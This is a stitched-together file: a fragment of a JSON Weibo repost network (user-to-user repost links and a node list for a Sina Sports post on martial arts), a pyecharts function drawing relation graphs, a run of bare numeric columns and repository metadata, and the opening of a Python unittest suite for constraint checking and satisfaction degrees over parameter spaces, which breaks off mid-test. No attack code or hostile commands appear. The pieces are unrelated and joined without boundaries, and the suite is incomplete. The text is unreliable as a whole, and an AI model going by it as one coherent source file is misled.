"target": "____-------____________"
},
{
"source": "新浪体育",
"target": "信仰铮"
},
{
"source": "新浪体育",
"target": "sekino"
},
{
"source": "新浪体育",
"target": "HexFireSea"
},
{
"source": "重工组长于彦舒",
"target": "猫饭P"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "简木生--包丰瀛",
"target": "Digital蚊子"
},
{
"source": "新浪体育",
"target": "简木生--包丰瀛"
},
{
"source": "重工组长于彦舒",
"target": "神之佩恩"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "重工组长于彦舒",
"target": "宋燕不v"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "Double润-JR"
},
{
"source": "新浪体育",
"target": "NouWl"
},
{
"source": "新浪体育",
"target": "IceE_U"
},
{
"source": "新浪体育",
"target": "一支钥匙一把锁"
},
{
"source": "新浪体育",
"target": "浪剑痕_秋水尽洗天下劫"
},
{
"source": "重工组长于彦舒",
"target": "甲壳咪殿下"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "牧羽尽人"
},
{
"source": "新浪体育",
"target": "米衫儿"
},
{
"source": "花卷沉湎",
"target": "北京_彬爷"
},
{
"source": "新浪体育",
"target": "花卷沉湎"
},
{
"source": "新浪体育",
"target": "MYS_Parker"
},
{
"source": "新浪体育",
"target": "直抵黄龙府与诸君痛饮尔"
},
{
"source": "新浪体育",
"target": "名字这么难听"
},
{
"source": "重工组长于彦舒",
"target": "MKIII_TROMBE"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "重工组长于彦舒",
"target": "吃鲸_满脑子打牌"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "重工组长于彦舒",
"target": "李哈喽年抓虫子"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "重工组长于彦舒",
"target": "吉原嗷子手中一碗张屏的面"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "不会结网的蜘蛛"
},
{
"source": "新浪体育",
"target": "小超-唐新"
},
{
"source": "新浪体育",
"target": "CJ一个微博"
},
{
"source": "lfx160219",
"target": "华府骏苑姜熙健"
},
{
"source": "开老爷车的熊",
"target": "lfx160219"
},
{
"source": "新浪体育",
"target": "开老爷车的熊"
},
{
"source": "新浪体育",
"target": "剑雨风竹wzp"
},
{
"source": "新浪体育",
"target": "刺猬-的生活"
},
{
"source": "新浪体育",
"target": "EL-bazinga"
},
{
"source": "Michael-Cheung-",
"target": "隐隐灵音"
},
{
"source": "新浪体育",
"target": "Michael-Cheung-"
},
{
"source": "lfx160219",
"target": "捣蛋少年2016"
},
{
"source": "开老爷车的熊",
"target": "lfx160219"
},
{
"source": "新浪体育",
"target": "开老爷车的熊"
},
{
"source": "重工组长于彦舒",
"target": "琉烟之烬"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "头条股票"
},
{
"source": "新浪体育",
"target": "八度鱼77"
},
{
"source": "新浪体育",
"target": "bywang1"
},
{
"source": "新浪体育",
"target": "寒木9740"
},
{
"source": "新浪体育",
"target": "不如一朵"
},
{
"source": "新浪体育",
"target": "牵下水拍照"
},
{
"source": "新浪体育",
"target": "实用格斗"
},
{
"source": "新浪体育",
"target": "焖猪脚"
},
{
"source": "新浪体育",
"target": "奔驰配件只售原厂全新"
},
{
"source": "重工组长于彦舒",
"target": "七绪平门"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "动物凶猛吗"
},
{
"source": "重工组长于彦舒",
"target": "皓乙_纯"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "lfx160219",
"target": "鹿允近衛連隊的黑少领要当牛仔了"
},
{
"source": "开老爷车的熊",
"target": "lfx160219"
},
{
"source": "新浪体育",
"target": "开老爷车的熊"
},
{
"source": "新浪体育",
"target": "真同你友缘"
},
{
"source": "新浪体育",
"target": "黄禾谷"
},
{
"source": "新浪体育",
"target": "刘志鲲"
},
{
"source": "lfx160219",
"target": "淘气的小福儿"
},
{
"source": "开老爷车的熊",
"target": "lfx160219"
},
{
"source": "新浪体育",
"target": "开老爷车的熊"
},
{
"source": "爱哟快乐",
"target": "上海曹凡"
},
{
"source": "我们认识",
"target": "爱哟快乐"
},
{
"source": "Christinez",
"target": "我们认识"
},
{
"source": "新浪体育",
"target": "Christinez"
},
{
"source": "新浪体育",
"target": "云信321312747"
},
{
"source": "新浪体育",
"target": "樱花突击队"
},
{
"source": "夏至蟲之音",
"target": "原始超越者2016"
},
{
"source": "重工组长于彦舒",
"target": "夏至蟲之音"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "長滒",
"target": "紫霄时雨_苍穹要塞难民"
},
{
"source": "新浪体育",
"target": "長滒"
},
{
"source": "新浪体育",
"target": "iFandom"
},
{
"source": "新浪体育",
"target": "自古秃顶多薄命"
},
{
"source": "VeryE",
"target": "上海曹凡"
},
{
"source": "爱哟快乐",
"target": "VeryE"
},
{
"source": "我们认识",
"target": "爱哟快乐"
},
{
"source": "Christinez",
"target": "我们认识"
},
{
"source": "新浪体育",
"target": "Christinez"
},
{
"source": "简木生--包丰瀛",
"target": "木_小呆是个死腐宅"
},
{
"source": "新浪体育",
"target": "简木生--包丰瀛"
},
{
"source": "重工组长于彦舒",
"target": "小马_1623085"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "读心术宋_Ssir226"
},
{
"source": "lfx160219",
"target": "广陵古散"
},
{
"source": "开老爷车的熊",
"target": "lfx160219"
},
{
"source": "新浪体育",
"target": "开老爷车的熊"
},
{
"source": "新浪体育",
"target": "赵伯安"
},
{
"source": "新浪体育",
"target": "非典型精彩"
},
{
"source": "新浪体育",
"target": "沐之夏吉郎"
},
{
"source": "新浪体育",
"target": "-梦魂舞晶-"
},
{
"source": "新浪体育",
"target": "子非鱼非子vit"
},
{
"source": "过去的老照片",
"target": "我的威海"
},
{
"source": "尧哥讲笑话",
"target": "过去的老照片"
},
{
"source": "没籽的葡萄好吃",
"target": "尧哥讲笑话"
},
{
"source": "新浪体育",
"target": "没籽的葡萄好吃"
},
{
"source": "新浪体育",
"target": "要酒还是要故事"
},
{
"source": "开老爷车的熊",
"target": "lfx160219"
},
{
"source": "新浪体育",
"target": "开老爷车的熊"
},
{
"source": "新浪体育",
"target": "FullMetalLyle"
},
{
"source": "新浪体育",
"target": "开拓者3569"
},
{
"source": "新浪体育",
"target": "斯坦家汪汪"
},
{
"source": "重工组长于彦舒",
"target": "丿胡丶半仙"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "简木生--包丰瀛",
"target": "破产伍伍陆"
},
{
"source": "新浪体育",
"target": "简木生--包丰瀛"
},
{
"source": "爱哟快乐",
"target": "VeryE"
},
{
"source": "我们认识",
"target": "爱哟快乐"
},
{
"source": "Christinez",
"target": "我们认识"
},
{
"source": "新浪体育",
"target": "Christinez"
},
{
"source": "新浪体育",
"target": "一路并肩而行baby"
},
{
"source": "我们认识",
"target": "爱哟快乐"
},
{
"source": "Christinez",
"target": "我们认识"
},
{
"source": "新浪体育",
"target": "Christinez"
},
{
"source": "重工组长于彦舒",
"target": "短昵称-"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "JoannaBlue"
},
{
"source": "新浪体育",
"target": "o0勇敢的心0o"
},
{
"source": "新浪体育",
"target": "没有烟了"
},
{
"source": "简木生--包丰瀛",
"target": "傲血困意"
},
{
"source": "新浪体育",
"target": "简木生--包丰瀛"
},
{
"source": "新浪体育",
"target": "人生装修中的王白薯"
},
{
"source": "新浪体育",
"target": "妙我居士"
},
{
"source": "新浪体育",
"target": "freeeeekick"
},
{
"source": "新浪体育",
"target": "不動的大圖書館Q"
},
{
"source": "新浪体育",
"target": "瑞新新新新"
},
{
"source": "新浪体育",
"target": "霹雳球球"
},
{
"source": "新浪体育",
"target": "山顶夫子"
},
{
"source": "新浪体育",
"target": "長滒"
},
{
"source": "新浪体育",
"target": "九翼龙皇"
},
{
"source": "Christinez",
"target": "我们认识"
},
{
"source": "新浪体育",
"target": "Christinez"
},
{
"source": "新浪体育",
"target": "就是内个少年"
},
{
"source": "新浪体育",
"target": "MrFopenheart"
},
{
"source": "新浪体育",
"target": "梦里自在"
},
{
"source": "新浪体育",
"target": "文武书书"
},
{
"source": "天天越野跑",
"target": "JeremyKevin"
},
{
"source": "新浪体育",
"target": "天天越野跑"
},
{
"source": "新浪体育",
"target": "看客二两七"
},
{
"source": "尧哥讲笑话",
"target": "过去的老照片"
},
{
"source": "没籽的葡萄好吃",
"target": "尧哥讲笑话"
},
{
"source": "新浪体育",
"target": "没籽的葡萄好吃"
},
{
"source": "新浪体育",
"target": "笑嘻嘻不是孬东西"
},
{
"source": "新浪体育",
"target": "奔跑在路上的小猪哥哥"
},
{
"source": "新浪体育",
"target": "明月照清疯"
},
{
"source": "新浪体育",
"target": "波灵谷"
},
{
"source": "重工组长于彦舒",
"target": "零崎本心"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "人总要变僵尸"
},
{
"source": "简木生--包丰瀛",
"target": "股民资源QQ719554823"
},
{
"source": "新浪体育",
"target": "简木生--包丰瀛"
},
{
"source": "新浪体育",
"target": "海中的小白鲨"
},
{
"source": "新浪体育",
"target": "小纯是不穿板甲的狂战"
},
{
"source": "新浪体育",
"target": "孙松AT"
},
{
"source": "重工组长于彦舒",
"target": "猿十三"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "重工组长于彦舒",
"target": "中二有治"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "幽径不再悲剧"
},
{
"source": "简木生--包丰瀛",
"target": "Daybreak_Canal"
},
{
"source": "新浪体育",
"target": "简木生--包丰瀛"
},
{
"source": "新浪体育",
"target": "门后的风铃"
},
{
"source": "重工组长于彦舒",
"target": "头喵的妈吃一身"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "花卷沉湎"
},
{
"source": "新浪体育",
"target": "flowtime"
},
{
"source": "没籽的葡萄好吃",
"target": "尧哥讲笑话"
},
{
"source": "新浪体育",
"target": "没籽的葡萄好吃"
},
{
"source": "新浪体育",
"target": "我叫照日格图"
},
{
"source": "新浪体育",
"target": "穆sir---"
},
{
"source": "新浪体育",
"target": "竹林之闲七"
},
{
"source": "新浪体育",
"target": "想去看看世界的小猴子"
},
{
"source": "新浪体育",
"target": "时间苍窮"
},
{
"source": "新浪体育",
"target": "入云伤"
},
{
"source": "新浪体育",
"target": "Ranyuewan"
},
{
"source": "新浪体育",
"target": "只愿华丽一次"
},
{
"source": "新浪体育",
"target": "一百五十斤的维洛妮卡"
},
{
"source": "简木生--包丰瀛",
"target": "熊宝-咪"
},
{
"source": "新浪体育",
"target": "简木生--包丰瀛"
},
{
"source": "重工组长于彦舒",
"target": "夏至蟲之音"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "鱼丸粗面"
},
{
"source": "重工组长于彦舒",
"target": "团子桃子的麻麻"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "简木生--包丰瀛",
"target": "balcktomato"
},
{
"source": "新浪体育",
"target": "简木生--包丰瀛"
},
{
"source": "新浪体育",
"target": "熬浆糊99"
},
{
"source": "新浪体育",
"target": "安庆爱慕摄影师阿文"
},
{
"source": "新浪体育",
"target": "章海波"
},
{
"source": "新浪体育",
"target": "熬浆糊99"
},
{
"source": "新浪体育",
"target": "霞客遗风"
},
{
"source": "新浪体育",
"target": "34X5A7"
},
{
"source": "新浪体育",
"target": "简木生--包丰瀛"
},
{
"source": "新浪体育",
"target": "花贰街"
},
{
"source": "新浪体育",
"target": "孤单一个人去返工II"
},
{
"source": "新浪体育",
"target": "Cindy是我的"
},
{
"source": "新浪体育",
"target": "Hu_子叔叔"
},
{
"source": "重工组长于彦舒",
"target": "东瓜_DONGGUA"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "BooM_讽_刺_"
},
{
"source": "新浪体育",
"target": "all-time-low"
},
{
"source": "重工组长于彦舒",
"target": "LP呆啊呆"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "Michael刘磊"
},
{
"source": "新浪体育",
"target": "君王板甲胡屠户"
},
{
"source": "新浪体育",
"target": "光明家具刘志军"
},
{
"source": "重工组长于彦舒",
"target": "MADAO兽-UP"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "重工组长于彦舒",
"target": "Cal_liu"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "重工组长于彦舒",
"target": "镜花水月137"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "上善若水_waterliker"
},
{
"source": "重工组长于彦舒",
"target": "FLAX_圩田经济学安心种地"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "重工组长于彦舒",
"target": "王小签"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "MR-WANGRX"
},
{
"source": "新浪体育",
"target": "美丽居曹亮"
},
{
"source": "新浪体育",
"target": "拖拉机再垃圾也能拖垃圾H"
},
{
"source": "新浪体育",
"target": "只道是寻常草履虫"
},
{
"source": "新浪体育",
"target": "最近很无聊---"
},
{
"source": "新浪体育",
"target": "HERO-熊"
},
{
"source": "新浪体育",
"target": "床保社"
},
{
"source": "重工组长于彦舒",
"target": "超昂闪存"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "天天越野跑"
},
{
"source": "新浪体育",
"target": "大伟MADSam"
},
{
"source": "重工组长于彦舒",
"target": "谷子地Dwane"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "王小硕的小马甲"
},
{
"source": "Christinez",
"target": "三口一瓶奶"
},
{
"source": "新浪体育",
"target": "Christinez"
},
{
"source": "重工组长于彦舒",
"target": "HBG_喵"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "李狗嗨ing"
},
{
"source": "重工组长于彦舒",
"target": "Eye2eyes"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "后仓松鼠"
},
{
"source": "重工组长于彦舒",
"target": "ERLIANGJO"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "捆着发木ALT"
},
{
"source": "重工组长于彦舒",
"target": "激素少女陈一水"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
},
{
"source": "新浪体育",
"target": "恩里克"
},
{
"source": "新浪体育",
"target": "没籽的葡萄好吃"
},
{
"source": "新浪体育",
"target": "偶尔有点帅1988"
},
{
"source": "新浪体育",
"target": "开老爷车的熊"
},
{
"source": "新浪体育",
"target": "北辰慢慢跑"
},
{
"source": "新浪体育",
"target": "Mitsuhide明智"
},
{
"source": "新浪体育",
"target": "不记得今天是礼拜几"
},
{
"source": "新浪体育",
"target": "耗社会主义股市羊毛"
},
{
"source": "新浪体育",
"target": "Christinez"
},
{
"source": "新浪体育",
"target": "Mr-LeeZL"
},
{
"source": "新浪体育",
"target": "给美希庆生的P_卡卡"
},
{
"source": "新浪体育",
"target": "重工组长于彦舒"
}
],
[
{
"name": ""
},
{
"name": "Camel3942"
},
{
"name": "Christinez"
},
{
"name": "JoannaBlue"
},
{
"name": "Michael-Cheung-"
},
{
"name": "NKmilitaryStudies"
},
{
"name": "Syfannn"
},
{
"name": "Tiger公子"
},
{
"name": "VeryE"
},
{
"name": "X_iao樓"
},
{
"name": "Xiao-斌杰"
},
{
"name": "_nearly转1"
},
{
"name": "lfx160219"
},
{
"name": "offfarmworkes2"
},
{
"name": "sazen"
},
{
"name": "stephen1999c"
},
{
"name": "w新晴w"
},
{
"name": "xHao晓灏"
},
{
"name": "上局沪段_沪"
},
{
"name": "中出宪政柏拉图"
},
{
"name": "中华龙会"
},
{
"name": "五十岚空芔"
},
{
"name": "京城吃货日记"
},
{
"name": "人形高达奈叶"
},
{
"name": "优质羊毛"
},
{
"name": "加菲杰克"
},
{
"name": "北京金戈戈"
},
{
"name": "南迦巴瓦的晨曦"
},
{
"name": "吉四六"
},
{
"name": "喷嚏网铂程"
},
{
"name": "嗨哥苏大少"
},
{
"name": "堕落熊猫001"
},
{
"name": "夏至蟲之音"
},
{
"name": "天天越野跑"
},
{
"name": "天水2院张医生"
},
{
"name": "天津王麟"
},
{
"name": "孟加拉虎的BLOG"
},
{
"name": "宋燕不v"
},
{
"name": "尧哥讲笑话"
},
{
"name": "开老爷车的熊"
},
{
"name": "张晨初艺术空间"
},
{
"name": "张欧亚"
},
{
"name": "我们认识"
},
{
"name": "战争史研究WHS"
},
{
"name": "战争史研究WHS:图片评论 http"
},
{
"name": "投行老人"
},
{
"name": "换个名字好累人"
},
{
"name": "新浪体育"
},
{
"name": "方便卫生起效慢"
},
{
"name": "无心耳语08"
},
{
"name": "暗能量泡泡"
},
{
"name": "歌手亚东"
},
{
"name": "没籽的葡萄好吃"
},
{
"name": "澳洲李市民"
},
{
"name": "灰狼多样性"
},
{
"name": "爱哟快乐"
},
{
"name": "猫饭P"
},
{
"name": "猿十三"
},
{
"name": "王唔悦"
},
{
"name": "相忘于2222"
},
{
"name": "简木生--包丰瀛"
},
{
"name": "紫霄时雨_苍穹要塞难民"
},
{
"name": "紹灝Lam"
},
{
"name": "罗昌平"
},
{
"name": "耳光赵荒唐"
},
{
"name": "肉食者Play"
},
{
"name": "胖猪猪呼呼睡"
},
{
"name": "花卷沉湎"
},
{
"name": "苗条的小实"
},
{
"name": "豆名扬"
},
{
"name": "过去的老照片"
},
{
"name": "远古的刀"
},
{
"name": "重工组长于彦舒"
},
{
"name": "長滒"
},
{
"name": "陇上优品-陶磊"
},
{
"name": "降夭除魔齐天大圣"
},
{
"name": "马周扬律师"
},
{
"name": "鬼面绣裁"
},
{
"name": "魔都310土匪"
},
{
"name": "麻黑浮云"
}
],
"#搏击VS太极# 近日武林不是很太平,争论也很多[思考]有网友翻出前全运会武术冠军、著名演员@李连杰 接受杨澜专访时说的话,李连杰认为武术套路就是花架子——“当然\n了”,不是杀人的功夫。因为现在不再需要真功夫了,所谓的真功夫就是杀人最快的方法。 http://t.cn/RXgIUxg . ",
"4102228300324979",
"新浪体育"
]
def create_charts():
    """Assemble a Page holding three Graph demos.

    1. A force-directed layout over eight synthetic nodes.
    2. The same nodes in a circular layout with labels shown.
    3. A real Weibo repost network unpacked from the module-level WEIBO data.

    Returns:
        Page: the pyecharts page containing all three charts.
    """
    page = Page()
    style = Style(width=1100, height=600)

    # Eight demo nodes; symbol sizes ramp up to 50 and back down.
    sizes = [10, 20, 30, 40, 50, 40, 30, 20]
    names = ["结点1", "结点2", "结点3", "结点4",
             "结点5", "结点6", "结点7", "结点8"]
    nodes = [{"name": label, "symbolSize": size}
             for label, size in zip(names, sizes)]

    # Fully connected: one directed link for every ordered node pair
    # (self-loops included), matching the original nested loop.
    links = [{"source": a.get('name'), "target": b.get('name')}
             for a in nodes for b in nodes]

    force_chart = Graph("关系图-力引导布局", **style.init_style)
    force_chart.add("", nodes, links, graph_repulsion=8000, line_color='#aaa')
    page.add(force_chart)

    circular_chart = Graph("关系图-环形布局", **style.init_style)
    circular_chart.add("", nodes, links, is_label_show=True,
                       graph_repulsion=8000, graph_layout='circular',
                       label_text_color=None)
    page.add(circular_chart)

    # WEIBO is (nodes, links, categories, content, mid, screen_name);
    # only the first three are fed to the chart.
    nodes, links, categories, cont, mid, _ = WEIBO
    weibo_chart = Graph("关系图-微博转发", **style.init_style)
    weibo_chart.add("", nodes, links, categories, label_pos="right",
                    graph_repulsion=50, is_legend_show=False,
                    line_curve=0.2, label_text_color=None)
    page.add(weibo_chart)
    return page
| 22.086862
| 154
| 0.292221
| 20,891
| 397,939
| 5.555981
| 0.051841
| 0.075386
| 0.120617
| 0.178556
| 0.831016
| 0.80423
| 0.803196
| 0.730008
| 0.724787
| 0.410451
| 0
| 0.016686
| 0.541427
| 397,939
| 18,016
| 155
| 22.088088
| 0.619358
| 0
| 0
| 0.465182
| 0
| 0.000056
| 0.28725
| 0.000515
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000056
| false
| 0
| 0.000056
| 0
| 0.000167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
39ead68beea1cb32863af63b04fed5049d63177d
| 12,455
|
py
|
Python
|
test/test_sample_space.py
|
xhajnal/DiPS
|
2e5d6e0a26d2b1cd44522dc521992e6d7cfe6883
|
[
"BSD-3-Clause"
] | 4
|
2020-04-25T22:29:43.000Z
|
2022-01-14T07:52:55.000Z
|
test/test_sample_space.py
|
xhajnal/DiPS
|
2e5d6e0a26d2b1cd44522dc521992e6d7cfe6883
|
[
"BSD-3-Clause"
] | 64
|
2020-01-06T18:38:56.000Z
|
2022-02-27T18:38:45.000Z
|
test/test_sample_space.py
|
xhajnal/DiPS
|
2e5d6e0a26d2b1cd44522dc521992e6d7cfe6883
|
[
"BSD-3-Clause"
] | 3
|
2020-02-13T16:46:54.000Z
|
2021-11-26T11:47:56.000Z
|
import os
import unittest
from sympy import Interval
from termcolor import colored
import src.sample_space as sample_space
from common.convert import normalise_constraint, split_constraints
from space import RefinedSpace
from src.refine_space import *
# Directory containing this test file; used to resolve test resources.
curr_dir = os.path.dirname(__file__)
class MyTestCase(unittest.TestCase):
    """Tests for src.sample_space: per-sample constraint checking,
    satisfaction degree, and whole-space sampling.

    The module under test is configured through its globals
    (glob_space, glob_constraints, glob_compress, ...); each test sets
    them explicitly before asserting.  With glob_compress=True the
    functions return a single aggregated value, with False a per-constraint
    list.
    """

    def test_check_sample(self):
        """check_sample: boolean satisfaction of a point, compressed and not."""
        print(colored("Testing check sample", 'blue'))
        ## Single constraint
        sample_space.glob_sort = False
        sample_space.glob_space = RefinedSpace(((0, 1), (0, 1)), ["p", "q"])
        sample_space.glob_debug = False
        sample_space.glob_compress = True
        sample_space.glob_constraints = ["0.3 < p+q < 0.8"]
        self.assertEqual(sample_space.check_sample([0, 0]), False)
        self.assertEqual(sample_space.check_sample([0, 0.5]), True)
        self.assertEqual(sample_space.check_sample([0.5, 0]), True)
        self.assertEqual(sample_space.check_sample([0.5, 0.5]), False)
        self.assertEqual(sample_space.check_sample([0.3, 0.3]), True)
        # Uncompressed: same points, result is a list with one entry per constraint.
        sample_space.glob_compress = False
        self.assertEqual(sample_space.check_sample([0, 0]), [False])
        self.assertEqual(sample_space.check_sample([0, 0.5]), [True])
        self.assertEqual(sample_space.check_sample([0.5, 0]), [True])
        self.assertEqual(sample_space.check_sample([0.5, 0.5]), [False])
        self.assertEqual(sample_space.check_sample([0.3, 0.3]), [True])
        ## Two constraints
        # Compressed result is the conjunction of both constraints.
        sample_space.glob_constraints = ["0.3 < p+q < 0.8", "p>q"]
        sample_space.glob_compress = True
        self.assertEqual(sample_space.check_sample([0, 0]), False)
        self.assertEqual(sample_space.check_sample([0, 0.5]), False)
        self.assertEqual(sample_space.check_sample([0.5, 0]), True)
        self.assertEqual(sample_space.check_sample([0.5, 0.5]), False)
        self.assertEqual(sample_space.check_sample([0.3, 0.3]), False)
        sample_space.glob_compress = False
        self.assertEqual(sample_space.check_sample([0, 0]), [False, False])
        self.assertEqual(sample_space.check_sample([0, 0.5]), [True, False])
        self.assertEqual(sample_space.check_sample([0.5, 0]), [True, True])
        self.assertEqual(sample_space.check_sample([0.5, 0.5]), [False, False])
        self.assertEqual(sample_space.check_sample([0.3, 0.3]), [True, False])
        ## Error - Division by zero
        # p/q at q=0 cannot be evaluated: compressed result is None,
        # uncompressed keeps None only for the failing constraint.
        sample_space.glob_constraints = ["0.3 < p/q < 0.8", "p>q"]
        sample_space.glob_compress = True
        self.assertEqual(sample_space.check_sample([0, 0]), None)
        sample_space.glob_compress = False
        self.assertEqual(sample_space.check_sample([0, 0]), [None, False])
        ## Single sided constraint
        sample_space.glob_space = RefinedSpace([(0, 1), (0, 1)], ["p", "q"])
        sample_space.glob_constraints = ["p < q"]
        sample_space.glob_compress = True
        self.assertEqual(sample_space.check_sample([0, 0]), False)
        self.assertEqual(sample_space.check_sample([0, 0.5]), True)
        self.assertEqual(sample_space.check_sample([0.5, 0]), False)
        self.assertEqual(sample_space.check_sample([0.5, 0.5]), False)
        self.assertEqual(sample_space.check_sample([0.3, 0.3]), False)
        sample_space.glob_compress = False
        self.assertEqual(sample_space.check_sample([0, 0]), [False])
        self.assertEqual(sample_space.check_sample([0, 0.5]), [True])
        self.assertEqual(sample_space.check_sample([0.5, 0]), [False])
        self.assertEqual(sample_space.check_sample([0.5, 0.5]), [False])
        self.assertEqual(sample_space.check_sample([0.3, 0.3]), [False])
        # Mirror check with the inequality flipped.
        sample_space.glob_constraints = ["p > q"]
        sample_space.glob_compress = True
        self.assertEqual(sample_space.check_sample([0, 0]), False)
        self.assertEqual(sample_space.check_sample([0, 0.5]), False)
        self.assertEqual(sample_space.check_sample([0.5, 0]), True)
        self.assertEqual(sample_space.check_sample([0.5, 0.5]), False)
        self.assertEqual(sample_space.check_sample([0.3, 0.3]), False)
        sample_space.glob_compress = False
        self.assertEqual(sample_space.check_sample([0, 0]), [False])
        self.assertEqual(sample_space.check_sample([0, 0.5]), [False])
        self.assertEqual(sample_space.check_sample([0.5, 0]), [True])
        self.assertEqual(sample_space.check_sample([0.5, 0.5]), [False])
        self.assertEqual(sample_space.check_sample([0.3, 0.3]), [False])

    def test_sample_sat_degree(self):
        """sample_sat_degree: signed distance of a point from the constraints.

        Positive means inside, 0 on the boundary, negative outside;
        compressed mode sums the per-constraint degrees.
        """
        print(colored("Testing satisfaction degree of a sample", 'blue'))
        sample_space.glob_sort = False
        sample_space.glob_space = RefinedSpace((0, 1), ["p"])
        sample_space.glob_debug = False
        sample_space.glob_compress = True
        constraints = ["0.3 < p < 0.8"]
        # Constraints are first normalised and split into single inequalities.
        constraints = list(map(normalise_constraint, constraints))
        constraints = split_constraints(constraints)
        sample_space.glob_constraints = constraints
        self.assertEqual(sample_space.sample_sat_degree([0]), - 0.3)
        self.assertEqual(sample_space.sample_sat_degree([0.5]), 0.2)
        self.assertEqual(sample_space.sample_sat_degree([0.3]), 0)
        self.assertEqual(round(sample_space.sample_sat_degree([0.9]), 2), -0.1)
        # NOTE(review): "p = 0.8" below looks like a typo for "p <= 0.8" —
        # the expected degrees match the interval above; confirm
        # normalise_constraint treats it that way.
        constraints = ["0.3 <= p = 0.8"]
        constraints = list(map(normalise_constraint, constraints))
        constraints = split_constraints(constraints)
        sample_space.glob_constraints = constraints
        self.assertEqual(sample_space.sample_sat_degree([0]), - 0.3)
        self.assertEqual(sample_space.sample_sat_degree([0.5]), 0.2)
        self.assertEqual(sample_space.sample_sat_degree([0.3]), 0)
        self.assertEqual(round(sample_space.sample_sat_degree([0.9]), 2), -0.1)
        sample_space.glob_compress = False
        self.assertEqual(sample_space.sample_sat_degree([0]), [- 0.3])
        self.assertEqual(sample_space.sample_sat_degree([0.5]), [0.2])
        self.assertEqual(sample_space.sample_sat_degree([0.3]), [0])
        self.assertEqual(list(map(lambda x: round(x, 2), sample_space.sample_sat_degree([0.9]))), [-0.1])
        # Two constraints over a 2D space; compressed degree is the sum.
        sample_space.glob_space = RefinedSpace(((0, 1), (0, 1)), ["p", "q"])
        constraints = ["0.3 < p+q < 0.8", "p > q"]
        constraints = list(map(normalise_constraint, constraints))
        print(constraints)
        constraints = split_constraints(constraints)
        print(constraints)
        sample_space.glob_constraints = constraints
        sample_space.sample_sat_degree([0, 0])
        sample_space.glob_compress = True
        self.assertEqual(round(sample_space.sample_sat_degree([0, 0]), 2), -0.3+0)
        self.assertEqual(round(sample_space.sample_sat_degree([0, 0.5]), 2), 0.2-0.5)
        self.assertEqual(round(sample_space.sample_sat_degree([0.5, 0]), 2), 0.2+0.5)
        self.assertEqual(round(sample_space.sample_sat_degree([0.5, 0.5]), 2), -0.2+0)
        self.assertEqual(round(sample_space.sample_sat_degree([0.3, 0.3]), 2), 0.2+0)
        sample_space.glob_compress = False
        self.assertEqual(list(map(lambda x: round(x, 2), sample_space.sample_sat_degree([0, 0]))), [-0.3, 0])
        self.assertEqual(list(map(lambda x: round(x, 2), sample_space.sample_sat_degree([0, 0.5]))), [0.2, -0.5])
        self.assertEqual(list(map(lambda x: round(x, 2), sample_space.sample_sat_degree([0.5, 0]))), [0.2, 0.5])
        self.assertEqual(list(map(lambda x: round(x, 2), sample_space.sample_sat_degree([0.5, 0.5]))), [-0.2, 0])
        self.assertEqual(list(map(lambda x: round(x, 2), sample_space.sample_sat_degree([0.3, 0.3]))), [0.2, 0])
        # Single-sided constraints: degree outside the unit box is allowed
        # ([4, 5] etc.) since only the expression value matters here.
        sample_space.glob_space = RefinedSpace([(0, 1), (0, 1)], ["p", "q"])
        constraints = ["p < q"]
        constraints = list(map(normalise_constraint, constraints))
        constraints = split_constraints(constraints)
        sample_space.glob_constraints = constraints
        sample_space.glob_compress = True
